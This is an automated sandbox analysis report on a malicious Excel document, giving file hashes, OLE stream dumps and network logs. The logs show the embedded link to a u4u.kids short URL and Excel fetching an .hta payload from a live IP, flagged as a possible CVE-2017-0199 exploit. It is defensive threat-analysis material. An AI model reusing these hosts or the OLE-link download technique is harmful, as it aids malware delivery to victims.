                      Preview:......................>...................................N...................Q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...........P...........S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:[ZoneTransfer]....ZoneId=0
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 20:19:41 2024, Security: 1
                      Category:dropped
                      Size (bytes):91648
                      Entropy (8bit):7.796999868317942
                      Encrypted:false
                      SSDEEP:1536:6iqHy1S6F8b2SQrEkawpoXIoHwfElrGQZemz70I4:KeFHrE2sIoHtlqMee7u
                      MD5:4D97A355B272A53AF68A87914823EB4F
                      SHA1:4463F5CD5EEDBF7F5752C2B4F848548F3AC5AA75
                      SHA-256:CC7C12F515395FE1836243BE253C006E040EBA454684E52B14DFB7404AE9B678
                      SHA-512:135F18A3FCC5EAC777D53176C1A121A4785A99DAE49DB072ACE5F6EA68AA919EC82E26C3CCD38174E0D2D7B70A68EE25DF2F54C0498FB42F3E8DE42F2A103CB1
                      Malicious:false
                      Preview:......................>...................................N...................Q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...........P...........S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:modified
                      Size (bytes):165
                      Entropy (8bit):1.4377382811115937
                      Encrypted:false
                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                      MD5:797869BB881CFBCDAC2064F92B26E46F
                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                      Malicious:true
                      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Oct 23 07:43:41 2024, Security: 1
                      Entropy (8bit):7.581512756769931
                      TrID:
                      • Microsoft Excel sheet (30009/1) 47.99%
                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                      File name:SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx
                      File size:100'864 bytes
                      MD5:3d36155c4af65b9dd19c7da9ed0461dd
                      SHA1:5ba7e33fbc5c6d208daaf5665176defb13aa1c65
                      SHA256:1078b2b307b35167121d518c004f8403f4d52bdb41c9f399fa141bf3a6f3c4ae
                      SHA512:25ebb6722308ca49813972d0b75c1d7da76df7dbb17e6c4c5eed8be22541b614d4df4e2133b68dc2d4044caa95be1d66a8ba3a82709f3dc3c9533e92568bfa74
                      SSDEEP:1536:piqHy1S6F8b2SQrEkawpoXIogl7t5qjkQVwKNEzXGOsErnUEYzi1dLPfA7:zeFHrE2sIogNt50kQVwKNEdlUTzi1dj
                      TLSH:64A3F12137E9C516F4D3B6760DEBC0DB460ABC0A9DA1C58B35D4732F5CBEA81898630B
                      File Content Preview:........................>...................................N...................Q..............................................................................................................................................................................
                      Icon Hash:2562ab89a7b7bfbf
                      Document Type:OLE
                      Number of OLE Files:1
                      Has Summary Info:
                      Application Name:Microsoft Excel
                      Encrypted Document:True
                      Contains Word Document Stream:False
                      Contains Workbook/Book Stream:True
                      Contains PowerPoint Document Stream:False
                      Contains Visio Document Stream:False
                      Contains ObjectPool Stream:False
                      Flash Objects Count:0
                      Contains VBA Macros:True
                      Code Page:1252
                      Author:WORMS
                      Last Saved By:91974
                      Create Time:2013-09-08T10:39:32Z
                      Last Saved Time:2024-10-22T13:14:21Z
                      Creating Application:Microsoft Excel
                      Security:0
                      Document Code Page:1252
                      Thumbnail Scaling Desired:false
                      Company:MAHIEDDINE
                      Contains Dirty Links:false
                      Shared Document:false
                      Changed Hyperlinks:false
                      Application Version:12.0000
                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                      VBA File Name:Sheet1.cls
                      Stream Size:977
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0 .
                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 98 92 ef ff 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Attribute VB_Name = "Sheet1"
                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                      Attribute VB_GlobalNameSpace = False
                      Attribute VB_Creatable = False
                      Attribute VB_PredeclaredId = True
                      Attribute VB_Exposed = True
                      Attribute VB_TemplateDerived = False
                      Attribute VB_Customizable = True
                      

                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                      VBA File Name:Sheet2.cls
                      Stream Size:977
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 98 92 96 6c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Attribute VB_Name = "Sheet2"
                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                      Attribute VB_GlobalNameSpace = False
                      Attribute VB_Creatable = False
                      Attribute VB_PredeclaredId = True
                      Attribute VB_Exposed = True
                      Attribute VB_TemplateDerived = False
                      Attribute VB_Customizable = True
                      

                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                      VBA File Name:Sheet3.cls
                      Stream Size:977
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 98 92 a2 40 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Attribute VB_Name = "Sheet3"
                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                      Attribute VB_GlobalNameSpace = False
                      Attribute VB_Creatable = False
                      Attribute VB_PredeclaredId = True
                      Attribute VB_Exposed = True
                      Attribute VB_TemplateDerived = False
                      Attribute VB_Customizable = True
                      

                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                      VBA File Name:ThisWorkbook.cls
                      Stream Size:985
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r I . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 98 92 72 49 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Attribute VB_Name = "ThisWorkbook"
                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                      Attribute VB_GlobalNameSpace = False
                      Attribute VB_Creatable = False
                      Attribute VB_PredeclaredId = True
                      Attribute VB_Exposed = True
                      Attribute VB_TemplateDerived = False
                      Attribute VB_Customizable = True
                      

                      General
                      Stream Path:\x1CompObj
                      CLSID:
                      File Type:data
                      Stream Size:114
                      Entropy:4.25248375192737
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      General
                      Stream Path:\x5DocumentSummaryInformation
                      CLSID:
                      File Type:data
                      Stream Size:244
                      Entropy:2.889430592781307
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                      General
                      Stream Path:\x5SummaryInformation
                      CLSID:
                      File Type:data
                      Stream Size:200
                      Entropy:3.292068105701867
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . % . . . . . . . . .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                      General
                      Stream Path:MBD000C18C6/\x1CompObj
                      CLSID:
                      File Type:data
                      Stream Size:99
                      Entropy:3.631242196770981
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      General
                      Stream Path:MBD000C18C6/Package
                      CLSID:
                      File Type:Microsoft Excel 2007+
                      Stream Size:38341
                      Entropy:7.85773182578822
                      Base64 Encoded:True
                      Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      General
                      Stream Path:MBD000C18C7/\x1Ole
                      CLSID:
                      File Type:data
                      Stream Size:886
                      Entropy:4.649811840674489
                      Base64 Encoded:False
                      Data ASCII:. . . . ; . } v 7 . . . . . . . . . . . . p . . . y . . . K . l . . . h . t . t . p . s . : . / . / . u . 4 . u . . . k . i . d . s . / . n . 7 . p . O . W . A . ? . & . r . e . g . u . l . a . t . i . o . n . = . n . o . i . s . y . & . m . i . x . e . r . = . n . e . e . d . l . e . s . s . & . b . r . o . w . n . = . g . r . o . t . e . s . q . u . e . & . p . a . r . e . n . t . = . j . u . m . b . l . e . d . & . l . u . t . t . u . c . e . = . f . a . m . o . u . s . & . h . a . r . b . o . u . r . =
                      Data Raw:01 00 00 02 df 3b 13 7d 76 b1 87 37 00 00 00 00 00 00 00 00 00 00 00 00 70 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 6c 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 75 00 34 00 75 00 2e 00 6b 00 69 00 64 00 73 00 2f 00 6e 00 37 00 70 00 4f 00 57 00 41 00 3f 00 26 00 72 00 65 00 67 00 75 00 6c 00 61 00 74 00 69 00 6f 00 6e 00 3d 00 6e 00 6f 00 69 00 73 00
                      General
                      Stream Path:Workbook
                      CLSID:
                      File Type:Applesoft BASIC program data, first line number 16
                      Stream Size:47149
                      Entropy:7.974473221701048
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . 3 3 ^ 6 ] . . ( . _ z ) k U V + } . . \\ m . e A . . . . . . . . . . . . \\ . p . K g [ F 4 f . . P ` s d 8 Z \\ [ & 5 . | D ^ / " . i ~ 5 C j < E d r . b % & . ; Y . . ! . i < s i p r l A / . . B . . . A a . . . p . . . = . . . J 2 ( ) Y . . . v . P m ? 8 . . . . . . . . f . . . . y . . . . \\ . . . % K . . . L = . . . m x 8 ) b N < u \\ m . @ . . . . . . l " . . . h M . . . . . . . 7 . . . A # 1 . . . U . C x 1 . . ^ . . r r R c 1 . . . w 7 . ! ] l K
                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 33 33 20 5e e5 82 36 83 ad 5d e3 0a d6 09 28 9f 1d 5f 7a 29 83 eb 8c 6b 55 e0 ff ad ba 56 97 2b ce 7d 20 02 91 f2 dd 0b 5c fb 6d 02 65 41 04 8a e1 00 02 00 b0 04 c1 00 02 00 e4 15 e2 00 00 00 5c 00 70 00 cd ec 4b 67 5b 46 34 66 12 10 81 85 d3 f0 50 60 81 73 9e 64 fb fe f0 c7 d3 c4 38 e0 5a 5c
                      General
                      Stream Path:_VBA_PROJECT_CUR/PROJECT
                      CLSID:
                      File Type:ASCII text, with CRLF line terminators
                      Stream Size:529
                      Entropy:5.237216692059749
                      Base64 Encoded:True
                      Data ASCII:I D = " { 9 0 6 8 0 C D 8 - 3 0 7 7 - 4 C 6 6 - A C A 9 - 1 5 6 3 9 6 0 4 6 6 E 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 4 1 6 B A 5 7 D E E E E 2 E E E
                      Data Raw:49 44 3d 22 7b 39 30 36 38 30 43 44 38 2d 33 30 37 37 2d 34 43 36 36 2d 41 43 41 39 2d 31 35 36 33 39 36 30 34 36 36 45 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                      General
                      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                      CLSID:
                      File Type:data
                      Stream Size:104
                      Entropy:3.0488640812019017
                      Base64 Encoded:False
                      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                      CLSID:
                      File Type:data
                      Stream Size:2644
                      Entropy:3.9875039637673106
                      Base64 Encoded:False
                      Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                      Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/dir
                      CLSID:
                      File Type:data
                      Stream Size:553
                      Entropy:6.361653284383787
                      Base64 Encoded:True
                      Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . J * i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                      Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 4a e3 2a 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-10-24T21:19:25.879708+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249162107.175.113.21480TCP
                      TimestampSource PortDest PortSource IPDest IP
                      Oct 24, 2024 21:19:24.201615095 CEST49161443192.168.2.2224.199.88.84
                      Oct 24, 2024 21:19:24.201666117 CEST4434916124.199.88.84192.168.2.22
                      Oct 24, 2024 21:19:24.201740980 CEST49161443192.168.2.2224.199.88.84
                      Oct 24, 2024 21:19:24.208123922 CEST49161443192.168.2.2224.199.88.84
                      Oct 24, 2024 21:19:24.208142996 CEST4434916124.199.88.84192.168.2.22
                      Oct 24, 2024 21:19:24.932580948 CEST4434916124.199.88.84192.168.2.22
                      Oct 24, 2024 21:19:24.932653904 CEST49161443192.168.2.2224.199.88.84
                      Oct 24, 2024 21:19:24.937659979 CEST49161443192.168.2.2224.199.88.84
                      Oct 24, 2024 21:19:24.937671900 CEST4434916124.199.88.84192.168.2.22
                      Oct 24, 2024 21:19:24.938154936 CEST4434916124.199.88.84192.168.2.22
                      Oct 24, 2024 21:19:24.938205957 CEST49161443192.168.2.2224.199.88.84
                      Oct 24, 2024 21:19:25.007019043 CEST49161443192.168.2.2224.199.88.84
                      Oct 24, 2024 21:19:25.051337004 CEST4434916124.199.88.84192.168.2.22
                      Oct 24, 2024 21:19:25.189994097 CEST4434916124.199.88.84192.168.2.22
                      Oct 24, 2024 21:19:25.190083027 CEST49161443192.168.2.2224.199.88.84
                      Oct 24, 2024 21:19:25.190094948 CEST4434916124.199.88.84192.168.2.22
                      Oct 24, 2024 21:19:25.190154076 CEST49161443192.168.2.2224.199.88.84
                      Oct 24, 2024 21:19:25.191437006 CEST49161443192.168.2.2224.199.88.84
                      Oct 24, 2024 21:19:25.191457987 CEST4434916124.199.88.84192.168.2.22
                      Oct 24, 2024 21:19:25.208506107 CEST4916280192.168.2.22107.175.113.214
                      Oct 24, 2024 21:19:25.215790033 CEST8049162107.175.113.214192.168.2.22
                      Oct 24, 2024 21:19:25.215863943 CEST4916280192.168.2.22107.175.113.214
                      Oct 24, 2024 21:19:25.215959072 CEST4916280192.168.2.22107.175.113.214
                      Oct 24, 2024 21:19:25.221421957 CEST8049162107.175.113.214192.168.2.22
                      Oct 24, 2024 21:19:25.879489899 CEST8049162107.175.113.214192.168.2.22
                      Oct 24, 2024 21:19:25.879708052 CEST4916280192.168.2.22107.175.113.214
                      Oct 24, 2024 21:19:30.912674904 CEST8049162107.175.113.214192.168.2.22
                      Oct 24, 2024 21:19:30.912975073 CEST4916280192.168.2.22107.175.113.214
                      TimestampSource PortDest PortSource IPDest IP
                      Oct 24, 2024 21:19:24.072762012 CEST5456253192.168.2.228.8.8.8
                      Oct 24, 2024 21:19:24.194489956 CEST53545628.8.8.8192.168.2.22
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Oct 24, 2024 21:19:24.072762012 CEST192.168.2.228.8.8.80x6eaeStandard query (0)u4u.kidsA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Oct 24, 2024 21:19:24.194489956 CEST8.8.8.8192.168.2.220x6eaeNo error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false
                      • u4u.kids
                      • 107.175.113.214
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.2249162107.175.113.214803288C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      TimestampBytes transferredDirectionData
                      Oct 24, 2024 21:19:25.215959072 CEST396OUTGET /xampp/nx/nixogivenbestthingswithgreatthingswillinthelineforgreatthings.hta HTTP/1.1
                      Accept: */*
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: 107.175.113.214
                      Connection: Keep-Alive
                      Oct 24, 2024 21:19:25.879489899 CEST542INHTTP/1.1 404 Not Found
                      Date: Thu, 24 Oct 2024 19:19:25 GMT
                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                      Content-Length: 301
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=iso-8859-1
